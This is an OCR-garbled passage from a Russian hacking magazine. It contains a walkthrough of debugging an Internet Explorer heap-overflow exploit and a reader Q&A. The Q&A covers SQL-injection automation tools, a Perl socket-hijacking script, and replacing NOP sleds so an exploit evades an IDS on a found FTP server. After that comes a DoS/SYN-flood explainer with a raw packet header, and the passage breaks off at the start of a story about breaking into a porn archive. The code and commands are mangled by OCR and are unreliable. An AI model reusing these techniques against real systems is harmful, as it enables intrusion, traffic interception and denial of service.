определенный исследовательский опыт, чтобы выделить блоки ди- 
намической памяти из общей массы. ЗоііІСЕ показал бы намного 
больше информации, но мы уже решили использовать ОІІу, так что 
не будем менять коней на переправе). 

Команда МОѴ ЕАХ, [ЕСХ+10], которая должна возвращать указа- 
тель, возвратила ноль, в результате чего следующая за ней коман- 
да МОѴ ЕАХ, [ЕАХ+ОСЬ] оказалась источником сбоя. Это самое 
настоящее разрушение объекта СЕІетепі, но вот кто его разрушил 
и почему, нам еще предстоит узнать. Во всяком случае, объект не 
был затерт строкой «ААА...ААА», иначе в дампе присутствовали 
бы соответствующие ей АЗСІІ-коды 41 Ь, а их там нет. Как это нет?! 
Куда подевалась наша строка? А вот сейчас найдем ее в памяти и 
узнаем! 

Нажимаем <АІ_Т-М> для вызова окна «тетогу», переходим в нача- 
ло адресного пространства по клавише «Ноте» и давим <СТВІ_-В> 
для поиска. Искать, конечно же, нужно в Ыпісобе. Строка находит- 
ся дважды. Первый раз — в стеке, по адресу ОООСООРОЬ, вместе с 
«<ОВЗЕСТ іуре=» и всеми остальными строками, второй раз — в 
куче, по адресу 00Е5 1 А60Ь, где следом за ней идет еще одна строка 
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взлом 



ш 



Ж Ж Ж Ж ^ ^ ^ 

ф .ф ф ^Ф ф ф ф ф ф ^Ф ф ф ф ф ф ф ф 



«ААА...ААА» и... больше ничего. Ага! Судя по всему, ІЕ смог обра- 
ботать только два объекта, после чего наступило переполнение, 
ведущее к исключению и аварийному завершению работы. Обра- 
тите внимание, что строка «ААА...ААА» (00Е50600И) лежит в непос- 
редственной близости от структуры данных, на которую указывает 
ЕСХ — 00Е552В0Н, однако их разделяет порядочное количество 
байт, и если переполнение происходит, то явно не здесь. Что ж, 
будем копать дальше! Тем более что у нас есть замечательная воз- 
можность начать следствие до начала преступления, установив 
точку останова на... 

Постой, а на что мы будем ее устанавливать?! Уж точно не на функ- 
цию ОеЮосРіг(), поскольку к моменту ее вызова данные уже разру- 
шены. Было бы замечательно брякнуться непосредственно на сам 
блок памяти и посмотреть, кто его разрушает, но, к несчастью, он 
выделяется динамически, и его адрес непредсказуем (тем более, 
как уже отмечалось, сбои происходят в различных местах). 

Уж не знаю, что бы мы стали делать, не будь в нашем распоряжении 
отладочных символов, но ведь они есть! Мы знаем, что блок памя- 
ти с падучей структурой данных инициализируется конструктором 
класса СЕІетепі, к которому принадлежит функция ѲеЮосРф), 
поэтому мы должны найти конструктор, установить на него точку 
останова и следить за всеми создаваемыми объектами. Возвра- 
щаемся в ЮА Рго, давим <СігІ-Раде 11р> для перехода в начало 

листинга, нажимаем <АІ_Т-Т> (поиск в листинге) и пишем « ШізсаІІ 

СЕІетепШСЕІетепІ» (так объявляется конструктор по правилам 



языка Си++). Не проходит и минуты, как ЮА Рго находит его по 
адресу 75АА321ВН (вообще-то отождествить конструктор можно 
и без отладочных символов, см. «Фундаментальные основы ха- 
керства» , электронную копию которых можно бесплатно скачать с 
Ир://пе 2 иті.ога.ги . но на это требуется время, которого у нас нет, а 
в битве за ехріоіі’ы каждая секунда дорога, так как нужно захватить 
управлениеуязвимыми машинами раньше всехостальных, создать 
огромную армию дронов и почувствовать себя Чингисханом). 



Дизассемблерный текст конструктора объекта СЕІетепІ 



Лехі:75АА321 В ; риЫіс: _1ГіізсаІІ СЕІетепі::СЕІетепІ(епит ЕІ_ЕМЕІ\ІТ_ТА(3, 
сіазз Сйос *) Щ 

,іехі:75АА321 В ??ОСЕІетепі@@ОАЕ<Ш4ЕЦЕМЕІ\ІТ_ТА(3@@РАѴСОос@@@2 
ргос пеаг Щ 

Тех1;:75АА321 В ризГі 

Лех1::75АА321С тоѵ 

,іехі:75АА321Е саІІ 

Тех1;:75АА3223 тоѵ 

,іехі:75АА3227 тоѵ 



Лехі:75АА3220 
.іехі:75АА3230 
Лехі:75АА3233 
,іехі:75АА3238 
,іехі:75АА323В 
ЛехІ:75АА323Р 
,іехі:75АА3241 
Лехі:75АА3247 
,іехі:75АА3249 
Лехі:75АА324В 
Лехі:75АА324Е 
,іехі:75АА324Р 

Лех1:75АА324Р ??ОСЕІетепі@@ОАЕ@ѴѴ4ЕЦЕМЕМТ_ТАО@@РАѴСОос@@@2 
епбр II 



Переключаемся наотладчик, переходим в окно СРІІ, давим <СТРІ_- 
0>, вводим адрес конструктора 75АА321В, устанавливаем точку 
останова на начало функции и перезапускаем отладчик по <СігІ- 
Р2>. Причем точка останова должна быть не программной (та, что 
ставится по <Р2>), а непременно аппаратной (подводим курсор к 
строке 75АСС4С0Н, нажимаем <5НіІі+Р10>, в появившимся кон- 
текстном меню выбираем Ьгеакроіпі -> Иагбѵѵаге, оп ехесиііоп). 
Поскольку МЗРІТМІ_Юи_ загружается динамически, программная 
точка останова, представляющая собой машинную инструкцию 
ІІ\ІТ ОЗИ, с опкодом ОСИ, безжалостно затирается системным за- 
грузчиком и потому не срабатывает. 

К своему стыду, ОІІуЮЬд не сохраняет аргументы командой строки 
отлаживаемого процесса при его перезапуске, поэтому ІЕ уверен- 
но стартует с домашней страницы, и ехріоіі приходится загружать 
вручную через «файл -> открыть -> обзор -> ІЕбіе2-З.ИітІ». Ріа 
этот раз ІЕ уже не грохается, а мирно вываливается в отладчик по 
точке останова! 

Конструктор вызывается множество раз, и, чтобы проследить за 
процессом инициализации каждого из объектов, необходимо пе- 
рейти в окно дампа и сказать <СТРІ_-Ѳ>, ЕСХ, где ЕСХ — регистр, 
в котором конструктору передается указатель на объект для конс- 
труирования. 

РІачинаем трассировать программу, двигаясь, словно саперы по 
минному полю, и обращая внимание на малейшие нюансы опе- 
ративного окружения. Оказывается, что конструктор выполняет 
только первичную инициализацию, и над объектом работает мно- 
жество функций, каждая из которых может оказаться источником 
разрушения. Чтобы сузить круг поиска, сосредоточимся наодном- 
единственном поле, расположенном по смещению ЮН от начала 
объекта (именно отсюда функция (ЗеЮосРгІ считывает инвалид- 
ный указатель, приводящий к сбою). Какпоказываеттрассировка, 
его инициализация осуществляется еще в конструкторе, и делает 
это пара команд: МОѴ ЕАХ,[ЕЗР+АРО_4]/МОѴ [Е5І+10Н],ЕАХ. Все 
ясно! Надо установить условную точку останова по этому адресу, 
срабатывающую, если ЕАХ указывает на инвалидный регион. На- 
блюдая за разрушенным блоком, можно прийти к заключению, что 
поле, расположенное по смещению ЮН, принимаетпроизвольные 
значения от ООН до ~Ю0Н. 

Поскольку ОІІуЭЬд условные аппаратные точки останова еще не 
поддерживает, приходится прибегать к помощи могуществен- 
ного ЗоШСЕ. Запускаем ІЕ с «домашней страницы», вызываем 
ЗоШСЕ нажатием на <СТВ1_-0>, переключаем контекст командой 
«АОЭВ ІЕХРЮРЕ», устанавливаем условную точку останова по ис- 
полнению «ВРМ 75АА322Э X ІЕ ЕАХ < 100», выходим изотлад 
чика и открываем в ІЕ наш подопытный «іебіе2-З.НітІ». Все равно 
ничего не выходит. Значит, ошибка сидит не в конструкторе и не 
в вызывающей его функции. Это очень хитрое переполнение, и, 
чтобы его запеленговать, необходимо изготовить специальный 
инструмент — свой собственный отладчик или плагин для ОІІуЭЬд 
или ЗоШСЕ, который бы выполнял следующие действия: 

• Устанавливал аппаратную точку останова на конструктор 



ѲЗІ ■ 

езі, есх 



??0СВазе@@<ЭАЕ@Х2 
еах, [езр+агд_4] | 



сіѵѵогсі ріг [езі],СЕІетеп1@@6В@ 



тоѵ 

іпс 

саІІ 

тоѵ 

тоѵ 

хог 

апсі 

хог 

тоѵ 

тоѵ 

рор 

геіп 



[езі+ІОГі], еах | 
сіѵѵогсі ріг [еах+8] 
?ЧпсгетепЮЬіесЮоипі@@ѴОХХ2 
еах, [езі+186] 
есх, [езр+агд_0] Ц 
есх, еах 
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СЕІѳтѳпЩСЕІѳтепІ и запоминал указатель, передаваемый ему 
через регистр ЕСХ; 

• При выходе из конструктора отбирал у первой страницы блока 
памяти все атрибуты доступа (РАѲЕ_І\ІОАССЕ55); 

• Отслеживал исключения, возникающие при обращении к страни- 
цам, и следил за полем 10И; 

• При обнаружении попытки записи недействительного указате- 
ля передавал управление отладчику, сигнализируя об ошибке тем 
или иным способом. 

Описанная технология позволяет следить за огромным числом 
блоков памяти, практически без снижения производительности. 
Написать и отладить плагин можно буквально за вечер. Считай это 
своим домашним заданием или жди, когда в Сети появятся готовые 
боевые ехріоіі’ы. 



[ акция журнала] 

ПОЛУЧИ 

ПОДАРОК 

за покупку журнала “Хакер” 




ЕСЛИ У ТЕБЯ ЕСТЬ 
КАРТА ММОСО.КЦ: 



Введи бонусный номер на 

ѵѵѵѵѵ\лтподо.ги/хакер и твой счет 
пополнится на 50 бонусов. 



Ваша награда за покупку журнала 



Уникальный 
бонусный номер 

105 256 333 025 



БОНУС 

50 



Дальше сам 

Проанализировав проблему, мы подтвердили, что уязвимость 
существует, и при обработке вложенных ОВ^СТ’ов происходит 
переполнение кучи, позволяющее не только обрушивать ІЕ, но и пе- 
редавать управление на шелл-код, однако при этом нам придется 
противостоять защитам типа ЭЕР, учиться находить АРІ-функции 
в памяти и осваивать много других вещей, подробно описанных 
в «Записках исследователя компьютерных вирусов» и «РогіаЫе 
зИеІІ-собіпд ипбег І\ІТ апб Ііпих», которые, как обычно, можно ска- 
чать с і 1 р://пе 2 иті.ога.ги . зс 



* 

IV, * 



* 







ННр://т п о ё о . г и 
с I и Ь @ т п о & о . г и 



Бонусный номер действителен в течение 35 дней со дня выхода журнала в продажу 



Оформи подписку и получи все 
бонусы сразу! 

* За полугодовую подписку счет 
пополнится на 150 бонусов! 

* За годовую подписку - 300 бонусов! 



ЕСЛИ У ТЕБЯ ЕЩЕ 
НЕТ КАРТЫ МІЧОСО.КІІ: 



* Заполни анкету на 

ѵѵѵѵѵѵ.тподо.ги /хакер и Хакер 
вышлет тебе карту Мподо.ш! 




■» Чтобы накопить на подарок 
быстрее, получай бонусы еще 
в 800 предприятиях! 

■» Обменивай бонусы на любой 

подарок: подписку на журнал Хакер, 
последние новинки СО, МрЗ и 
еще на 600 призов из каталога 
на ѵѵѵѵѵѵ.тподо.ги 



+ В День Рождения тебя ждет 
бонусный подарок! 
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Подробности потел.: (495) 961-11-66 







НАСК- 




Маск-^аа@геаІ .хакер, т 



А: Подскажите, каким соф- 
том можно воспользовать- 
ся для перенаправления 
портов? 

Для начала надо определиться с тем, 
что собой представляет утилита перена- 
правления портов. Сервисная программа 
направляет ТСР/ІР-трафик, полученный ею 
на одном из портов, к другому, и, возмож- 
но, к хосту, указанному самой утилитой. 
За исключением обработки ІР-адресов и 
номеров портов при перенаправлении иг- 
норируется тип протокола, то есть утилита 
не заботится о том , какой трафик передает- 
ся с ее помощью. Она функционирует как 
канал для ТСР/ІР-подключений. Самой из- 
вестной тулзой из этой сферы, безусловно, 
является баіаріре. Существуют реализации 
данной утилиты на си и на перле, что дела- 
ет ее кроссплатформенной. Использовать 
баіаріре несложно: ./баіаріре Іосаірогі 

гетоіерогі гетоіебозі. Значение Іосаірогі 
определяет номер порта, прослушивае- 
мого на локальной системе, гетоіерогі и 
гетоіебозі определяют номер порта, на ко- 
торый будут перенаправлены данные, имя 
хоста или адрес получателя. Второй утили- 
той является Тріре, созданная компанией 
Іоипбзіопе. В отличие от баіаріре она может 
использоваться только в ѴѴіпбоѵѵз-систе- 
мах, что является большим недостатком. 
Однако Іріре поддерживает несколько воз- 
можностей, недоступных в баіаріре. В час- 
тности, добавлена поддержка протокола 
пользовательских дейтаграмм (ІЮР — ІІзег 
баіадгат Ргоіосоі), возможность указывать 
локальный интерфейс, на котором будет 
работать утилита, а также номер порта от- 
правителя. Помимо них существует также 
утилита с пользовательским интерфей- 
сом под названием Ѵіба (ѴізиаІ Іпіегасііѵе 



йаіаріре: ѵѵѵѵѵѵ.ѵібаІаріре.зоигсеІогае.пеіЛ . 
Данная утилита может поддерживать сразу 
несколько каналов перенаправления, ау- 
тентификацию по паролю при перенаправ- 
лении, подсчет количества переданных че- 
рез каналы байт трафика, снифинг данных, 
а также захват фуаскіпд) соединений. 



А; Существует ли софт, ав- 
томатизирующий получе- 
ние информации из базы 
данных при слепой инъ- 
екции зці-кода (ЫіпсІ зці 
іп|есІіоп)? 

О: Да, есть достаточно много утилит, поз- 
воляющих автоматизировать процесс. На- 
пример, ВЗЦІЫ2 ( ѵѵѵѵѵѵ.51 4.ез/Н1тІ/реп-1езД . 
которая представляет собой скрипт на 
перле с диі-интерфейсом. Поддерживает 
передачу методами деі и розі, позволяет 
использовать брутфорс с использованием 
словаря или по наборам символов, включа- 
ющим в себя цифры, ППСІ5-ХЭШИ, символы 
или пользовательский набор. Утилита под- 
держивает работу через прокси-сервер, с 
поддержкой авторизации, причем она так- 
же позволяет задать и список серверов, 
через которые будут идти запросы. Кроме 
того, есть поддержка работы с соокіез. Так- 
же утилита позволяет задать произвольные 
значения заголовков изег-адепі для за- 
просов, для которых также можно создать 
список и сохранить его в файл. Для обхода 
ібз утилита может использовать времен- 
ные интервалы между запросами, причем 
поддерживаются два вида задания задер- 
жек: конкретное значение или временный 
интервал, из которых случайным образом 
выбирается текущее значение. 

Еще одной неплохой программой, правда, 
работающей только в ѴѴіпбоѵѵз-системах, 



является ЗОІ_ Роѵѵег Іфесіог. Она позицио- 
нируется как средство, облегчающее ра- 
боту с зці іпіесііоп, и позволяет не только 
автоматизировать получение данных при 
слепой инъекции, но и работать с обычной 
инъекцией зці-кода. Возможности програм- 
мы: работа с несколькими базами данных 
(МЗЗОІ_, МуЗОІ_ и Огасіе), получение таких 
характеристик, как длина и количество, а 
также возможность перебора на основа- 
нии временных задержек в выполняемых 
запросах. 

А: Расскажите про уязви- 
мость зоскеі Нцаскіпд 

О: Уязвимость зоскеі: Иуаскіпд, она же 
захват службы или сокета, заключается в 
следующем. Многие службы в дефолтовых 
настройках при открытии портов биндят 
сокет таким образом, чтобы слушать все 
интерфейсы, что в выводе пеізіаі выгля- 
дит, как 0.0.0.0:порт или *.*.*. *:порт. Это 
позволяет службе обрабатывать запросы, 
пришедшие на заданный порт, вне зависи- 
мости от сетевого интерфейса машины, на 
который пришел пакет. Также если в сис- 
теме созданы несколько сокетов, один из 
которых слушает все интерфейсы на опре- 
деленном порту, а другой слушает опреде- 
ленный интерфейс, например 192.168.0.1, 
на том же порту, что и предыдущий, то при 
переходе запроса на 192.168.0.1 он будет 
обрабатываться сокетом, забинденным 
на этот интерфейс, а не сокетом на все 
интерфейсы. Естественно, просто так ис- 
пользовать порт, уже занятый системой, не 
получится. Для того чтобы отобрать себе 
порт, нужно воспользоваться опцией соке- 
та 0_Р\Е1)ЗЕАЭ0Р. Она позволяет с помо- 
щью функции ЬіпсІ связаться с портом, даже 
если существуют ранее установленные 
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соединения. Параметр 30_РЕ113ЕАЭ0Р 
позволяет множеству экземпляров одного 
и того же сервера запускаться на одном 
и том же порте, если все экземпляры свя- 
зываются с различными локальными ір- 
адресами. Из всего вышеперечисленного 
следует, что если атакующий, используя 
опцию ЗО.ПЕІІЗЕАЭЭР, создаст сокет на 
определенном локальном интерфейсе с 
портом, совпадающим с номером порта, за- 
пущенного в системе демона, то он сможет 
перехватывать запросы, идущие к демону. 
Для большинства служб, таких как бДр, Іір, 
еіс, это не составит проблемы, поскольку 
они связываются с привилегированным 
портом, меньшим 1024, для использования 
которых необходимы права гооі-пользова- 
теля. Следовательно, любой процесс, пы- 
тающийся завладеть этим портом, также 
требует прав привилегированного пользо- 
вателя. В большинстве нормальных опера- 
ционных системах для использования уже 
связанных непривилегированных портов 
также требуются права пользователя, от 
которого запущен уже работающий сер- 
вис. Все описанное справедливо для боль- 
шинства систем, но не для всех. В ѴѴіпбоѵѵз- 
системах, например, захват порта является 



С:\регІ_5оигсе>пеІзІаІ -ап 
Имя Локальный адрес Внешний адрес 
Состояние 

ТСР 0.0.0.0:80 О.О.О.ОЮ иЗТЕІЧІЫО 



Создаем с помощью скрипта сокет, связан- 
ный со специфичным интерфейсом 



С:\регІ_5оигсе>геи5е.рІ 192.168.0.2 80 
Тгу сгеаіе зоскеі ... [ООЫЕ] 



Вывод пеізіаі приобретает вид: 



Имя Локальный адрес Внешний адрес 
Состояние 

ТСР 0.0.0.0:80 О.О.О.ОЮ иЗТЕМІЫѲ 
ТСР 192.168.0.2:80 О.О.О.ОЮ иЗТЕМЫѲ 



Теперь, если обратиться к адресу 
192.168.0.2 на порт 80, то запрос перехва- 
тит наш скрипт, а не бКр-сервер. Проде- 
монстрирую: 



с:\>пс 192.168.0.2 80 

Зоі ІпаскесІ! 

с:\> 



Таким образом, атакующий может, исполь- 
зуя захват службы, создать туннель между 
захваченным интерфейсом и реальным 
сервером, попутно сохраняя всю информа- 
цию, проходящую через этот туннель в обо- 
их направлениях. Это приведет к перехвату 
конфиденциальной информации. 

А: Нашли с друзьями в ло- 
кальной сети РТР-оервер, 
уязвимый к переполнению 
буфера, скачали эксплойт, 
скомпилировали как надо. 
При проверке на тестовом 
сервере все работает за- 
мечательно, а вот против 
того фтпшника не катит. 
Удалось разведать, что 
там стоит хитрая ісів, кото- 
рая отлавливает пор’ы в 
коде. Посоветуй, чем бы в 
коде эксплойта заменить 
эти самые нопы? 



О В качестве нопов сойдутлюбые ассемб- 
лерные команды, которые не приводят ни к 
каким действиям. Например, такие как: 




тоѵ ах, ах 


; 2 байта 


хсіід ах, ах 


; 2 байта 


Іеа Ьх,[Ьх] 


; 2 байта 


зЫ еах,0 


; 4 байта 


зіігсі еах, еах, 0 


; 5 байт 



При использовании таких команд глав- 
ное — следить за выравниванием, посколь- 
ку они, в отличие от І\ЮР, занимают более 
одного байта. Также можно сочетать коман- 
ды инкремента и декремента регистров: 



іпс еах — увеличить на 1 
сіес еах — уменьшить на 1 



Точно так же можно воспользоваться тем, 
что в большинстве шелл-кодов, в начале 



работы, регистры обнуляются, и можно 
без опаски менять значения регистров с 
помощью команд іпс еах — 0x40 , іпс еЬх 
— 0x43 , бес еах - 0x48 , бес еЬх 0x4В и тому 
подобных. Плюсом данных команд является 
то, что, во-первых, они занимают по одному 
байту, а во-вторых, то, что они совпадают 
с отображаемыми символами АЗСІІ. Таким 
образом, вместо цепочки нопов можно 
использовать, например, такую строчку: 
«НАСК», что совпадает с бес еах, іпс есх, 
іпс еЬх, бес еЬх. Конечно, при условии, что 
регистры еах, есх, еЬх будут обнулены в на- 
чале шелл-кода. 

А: Занимался поиском и 
взломом беспроводных 
сетей и озадачился сле- 
дующим вопросом: можно 
ли снифер заставить рас- 
шифровать ѵѵер сразу при 
перехвате, если ключ у 
меня уже есть? 

О: Можно. Для этого воспользуйся сниф- 
фером, например еіИегеаІ, поддерживаю- 
щим расшифровку ѵѵер. Чтобы включить 
эту возможность, зайди в меню Ебіі -> 
Ргеіегепсез -> Ргоіосоіз -> ІЕЕЕ 802.1 1 , вве- 
ди количество ключей в «ѴѴЕР кеу соипі» и, 
соотвтственно, сами ключи в необходимые 
поля, ш 



ОСТЕРЕГАЙСЯ 
ЗАДАВАТЬ ОБЩИЕ 
ВОПРОСЫ ВРОДЕ 
«КАК ВЗЛОМАТЬ 
ИНТЕРНЕТ?» ИЛИ 
«КАК УЗНАТЬ ІР 
ЛАМЕРА В ЧАТЕ ». 
ОТВЕТЫ НА НИХ 
ВРЯД ЛИ ТЕБЯ 
ОБРАДУЮТ. УЖЕ 
НЕ ГОВОРЯ О ТОМ. 
ЧТО ЦЕНЗУРА НЕ 
ПОЗВОЛИТ НАМ ИХ 
ОПУБЛИКОВАТЬ. 



вполне тривиальной задачей. Для иллюст- 
рации всего вышеописанного можно вос- 
пользоваться небольшим кодом на перле: 



#!/изг/Ьіп/регІ 
изе ІО::ЗоскеІ; 

$І++; 

й(@АРІОѴ < 2) { ргіп* “бзаде $0 <ІР> <РОРЛ">\ 
п”; ехк(); } 

ргіпі “Тгу сгеаіе зоскеі 
$зоск = ІО::5оскек:ІЫЕТ->пеѵѵ( Ызіеп => 20, 
І_осаІАсІсІг => $АРѲѴ[0], 

Ргоіо => Чср’, 

І_осаІРог1 => $АРКЗѴ[1], 

Реизе => 1 
); 

Щ$зоск) { ргіпі “ [ООЫЕ]\п”; } 
еізе { ргіпі “ [РАІІ_ЕО]\п”; ехк(); } 

\л/ИіІе($сІіепі = $зоск->ассерІ) 

{ 

ргіпі $сІіепі “Ооі ІіаскесІ!”; 
сІозе($сІіеШ); 

} 



На системе запущен ИДр-сервер, слушаю- 
щий все интерфейсы. 
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ІІІѴІІІЦмі 



Что такое ООоЗ-атаки сейчас, пожалуй, знает даже ребенок. Мы не 
раз писали в журнале о том, каким именно образом можно завалить 
неугодный сервак. Однако, несмотря на это, нам приходят письма от 
читателей, которые обвиняют нас в том, что мы рассказываем обо 
всем поверхостно. Сегодня пришло время исправить эту ситуацию. 



Вспомнить все ■ Давай объединим все наши знания 

по теме для закрепления материала. Как ты уже, наверное, знаешь 
ЭоЗ — это атака на отказ в обслуживании (ЭоЗ — ЭепіаІ оі Зегѵісе). 
Непосредственно к ЭЭоЗ мы вернемся немного позже. Как извес- 
тно, такого рода атаки осуществляются путем засорения канала 
жертвы пакетами определенного типа, что отправляет жертву в 
глубокую кому. Думаю, объяснять, для чего используют подобного 
рода атаки бессмысленно, поэтому едем дальше. 

Досдосѵрозиь ■ Т акие атаки можно проводить дву- 
мя известными способами. Первый заключается в использовании 
уязвимостей жертвы. При помощи специально сформированного 
пакета реализуется нехитрое переполнение буфера, и жертва уле- 
тает в астрал. 

Второй и более распространенный — это отправка большого ко- 
личества построенных определенным образом сетевых пакетов, 
то есть, грубо говоря, флуд. При этом надо уяснить для себя, что 
совсем не обязательно придумывать самому какую-то особую ре- 
ализацию сетевого пакета. С такой же степенью поражения доста- 
точно просто «забомбить» сервер стандартными запросами. Кста- 
ти, о подобном уже писали в апрельском номере. Посмотри статью 
« Вся правда о слэдшот» , как раз там рассматривался эффект, ког- 
да огромное количество людей с малым интервалом во времени за- 
ходили на страницу. В этом случае ресурс, где была расположена 
эта страничка, падал, не выдержав такого числа клиентов. 

Тут самое время вспомнить сетевую утилиту ЗрпД которая была 
разработана для системных администраторов, желающих прове- 
рить свой сервер к устойчивости на банальный НТТР (ЗЕТ ОоЗ. За 
каждую секунду, по нарастающей, программа подключается к ука- 
занному серверу до тех пор, пока сервер не перестанет отвечать. 
Это означает, что он либо ушел в кому, либо использует грамотную 
реализацию защиты от подобных атак. 

Вся хитрость такого флуда заключается в следующем. Допустим, 
мы посылаем несколько пакетов серверу с бесконечно малым 
интервалом времени между ними, то есть друг за другом. Пока 
сервак шаманит над первым пакетом, остальные помещаются в 
буфер. Соответственно, чем больше таких пакетов, тем больше 
памяти занимает буфер для их хранения. Исхода тут два. Первый 
и самый распространенный заключается в том, что наступит 
момент, когда буфер сожрет все доступные системные ресурсы, 
тем самым замедлит работу сервера, а то и вовсе его остановит. 
Результат налицо: сервак в дауне и не отвечает на запросы. Есть, 
конечно, и второй вариант, при котором произойдет переполне- 
ние, вызывающее критический сбой системы. И тут уже потребу- 
ется перезагружать сервер вручную. Второй вариант, разумеется, 
более продуктивен для нас :). 



!* и * *р-ч р * 






\щ 








- 11 2 , 


т С і 1 ■■■■ Ч <111 іими (іМм 


іч 


■и ігіяі- ичьп 


- 1-1 



Однако не все такие глупые, поэтому зачастую для завершения 
атаки требуется поддерживать постоянный ЭоЗ-поток, поскольку 
как только стрим левых запросов исчезнет, сервер вновь начнет 
обслуживать клиентов. 

Так как нее бомбитьР 

когда любой сервант можно было заддосить простейшим ріпд’ом с 
нескольких компьютеров. В принципе, такие времена и не начина- 
лись: когда каналы были для этого достаточно узкими, никому и в 
голову не приходило заниматься подобной ахинеей. 

Можно также вспомнить баги в популярном софте, заюзав кото- 
рые можно было легко зафлудить какого-нибудь домашнего поль- 
зователя. К примеру, несколько лет назад можно было легко было 
задосить ісц-пользователя, прислав ему в оффлайн несколько 
тысяч смайликов. 



бУб-наводнение. 



Наиболее простым способом 
проведения ЭоЗ-атак является ЗУІ\І-наводнение. Происходит это 
по следующей схеме. Атакующий компьютер посылает ЗУЫ-па- 
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Схема простейшего ЗУМ-флуде^ 
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взлом 



кѳт жертве и, соответственно, получает обратно ЗѴІМ/АСК-пакет. 
Если атакующий подтвердит АСК-пакетом факт получения ответа, 
то машины посчитают, что соединение установлено. Однако если 
атакующий не будет подтверждать этот факт, а продолжит посто- 
янно передавать ЗѴІ\І-пакет на соединение, то запись о незавер- 
шенной процедуре подключения будет добавлена в буфер жертвы 
до истечения тайм-аута ответа. Когда в буфере накопится доста- 
точное количество запросов, произойдет переполнение. После 
этого жертва перестанет отвечать на пользовательские запросы. 
Вот, собственно, и вся схема атаки. Чтобы не быть голословным, 
приведу пример заголовка пакета при данной атаке: 



зоск. 
воск, 
зоск. 
зоск. 
зоск. 
зоск. 
зоск. 
зоск. 
зоск. 
зоск. 
зоск. 



ір.ѵегзіоп=4; 

ір.іЫ=5; 

ір.1оз=0; 

ір.1оі_1еп=1ііопз(40); 

ір.іб=деІріб(); 

ір.Ігад_оИ=0; 

ір.Ш=255; 

ір.ргоІосоЫРРВОТО_ТСР 

ір.сбеск=0; 

Ір.зас1с1г=зас1с1гезз; 

Ір.с1ас1с1г=с1ас1с1гезз; 



//Версия 

//Длина заголовка 
//Тип сервиса 
//Общая длина 
/ПО 

//Смещение фрагмента 
//Время жизни 
; // Используемый протокол 
// Контрольная сумма 
//Адрес источника 
//Адрес назначения 



Аналогичные примеры разбросаны по всему Интернету, поэтому 
я не удивлюсь, если ты его уже где-то встречал или же постил сам. 
Обрати внимание на ІгадтепЦэф то есть на смещение фрагмен- 
та. В некоторых случаях использование длинных пакетов с боль- 
шой фрагментацией дает желаемый результат намного быстрее 
приведенного метода. 

Вот еще хороший пример нашей атаки. Нам потребуются, как 
минимум, два компьютера :). Мы посылаем пакет на порт 7 (есНо) 
атакуемого хоста. При этом надо подменить адрес отправителя 
(кстати, об этом позже), который будет указывать у нас на порт 
1 9 (сбагдеп) другого хоста. Между двумя хостами произойдет про- 
цесс передачи информации постоянным потоком. То есть пакет, 
как феерический заяц-забегаец, начнет прыгать от одного хоста 
к другому, переключая все внимание серверов на себя. Таким об- 
разом, они буквально забомбят себя до состояния вантуза. Как 



Про ВАѴѴ-сокеты ты можешь найти 
информацию как на МЗРМ.сот . так и на 
ВЗРІЧ.ги. 



итог — отказ в обслуживании . 

Помнишь, я говорил про фрагментацию пакета?Так вот, такой вид 
атаки принято называть ІСМР ІІооб, и он заключается в посылке 
болыших(64Кб),сильнофрагментированныхпакетов. Обслужива- 
ние таких данных очень напрягает сервер, и он решает, что лучше 
уйти на покой. На сегодняшний день такими технологиями, конеч- 
но, пользуются, но редко. Это уже ЭЭоЗ — распределенная атака 
на отказ в обслуживании. Чтобы провести такую пакость, потре- 
буется усиливающая сеть, даже не обязательно потрояненная 
тобой. В этом-то самое сильное и заключается. Вот смотри. Есть у 
нас жертва и миллионы пользователей Интернета. Что будет, если 
этим миллионам пользователей послать есбо-пакет от имени ата- 
куемого хоста? Правильно, они ответят этому хосту. Все вместе. 
Сразу. Думаю, хосту будет легче застрелиться, чем получать эти 
ответы. Что, собственно, в результате с ним и произойдет. 



добно тем, что сейчас изучают недокументированные функции 
систем и копаются в ядре, то есть мыс вами :). Теперь же работа 
с «сырыми сокетами» стала всеобщим достоянием, и пользу- 
ются ей, как показывает практика, по большей части именно 
представители сетевого андеграунда. 



Что дозволено Юпитеру - 

не дозволено быку ■ Вот такие вот мы теперь 

крутые, можем написать свой ЭЭоЗ, да и вообще все замечатель- 
но. Однако не следует забывать, что повесить яндекс с диалапа 
не так просто, как кажется на первый взгляд. В принципе, можешь 
попытаться. Умные люди для этих целей используют свои армии 
затрояненных машин — ОЭоЗ-ботнеты. 
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Еще не конец . Е 



і Всего, конечно же, не опишешь, од- 
нако я хотел рассказать про самую суть, чтобы ты узрел, наконец, 
в корень проблемы, а не в стебель конопли. Как видишь, нет ни- 
чего сверхсложного в технологии ЭЭоЗ. Написать своего ЭЭоЗ- 
бота можешь даже ты. Другое дело, что лкзі^щюгонах за это тебе 
спасибо не скажут. =н= 



Сокеты сокетам рознь ■ Долгое время под- 
держка РАѴѴ Зоскеіз — «сырых сокетов» — была реализована 
только в дистрибутивах ІІІЧІХ. «Сырые сокеты» представляют 
большой интерес для тех, кто занимается досом (слово «сы- 
рые» здесь указывает на дополнительные низкоуровневые 
возможности разработки сетевых приложений). Программисту 
становится доступной масса вещей, вроде подмены информа- 
ции в пакете, изменения адреса отправителя в пакетах более 
высокоуровневых протоколов и т.д. 

Конечно, и раньше такое проделывали. Но то были умы, по- 



Спрут за работой 



На нашем РѴО-диске ты найдешь 
исходники различных ООо8-модулей. 
Я думаю, ты понимаешь, что они долж 
ны помочь тебе правильно настроить 
защиту сервера, а не наоборот. 
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_ елезом каленый вытравим скуку! 
І сть верный способ* на все времена 
у разу и много - а этом вся штука! 
а кап возможность вам будет дана - 
^ банок легко умещаются в руку. 





ЕСЛИ Я СКАЖУ что г, 

ИНЕТЕ МНОГО ПОРНО 



ТЬ| УЛЫБНЕШЬСЯ, 



ИНТЕРНЕТ — ЭТО ОДИН ОГРОМНЫЙ ПОРНО- 
АРХИВ С НЕБОЛЬШИМИ ОСТРОВКАМИ САЙТОВ 
РАЗЛИЧНОГО СОДЕРЖАНИЯ. В ЭТОЙ СВЯЗИ 
СОВЕРШЕННО НЕПОНЯТНО, ПО КАКОЙ ПРИ- 
ЧИНЕ ТАК МАЛО ВЗЛОМОВ НАПРАВЛЕНО НА 
ЭТУ ОБЛАСТЬ. ПАРУ МЕСЯЦЕВ НАЗАД Я РЕШИЛ 
ВОСПОЛНИТЬ ЭТОТ ПРОБЕЛ И ОТЫМЕТЕ ОДИН 
КРУПНЫЙ ПОРНОАРХИВ. 



Вечер наступил незаметно. Уже начинало смеркаться, а я все еще 
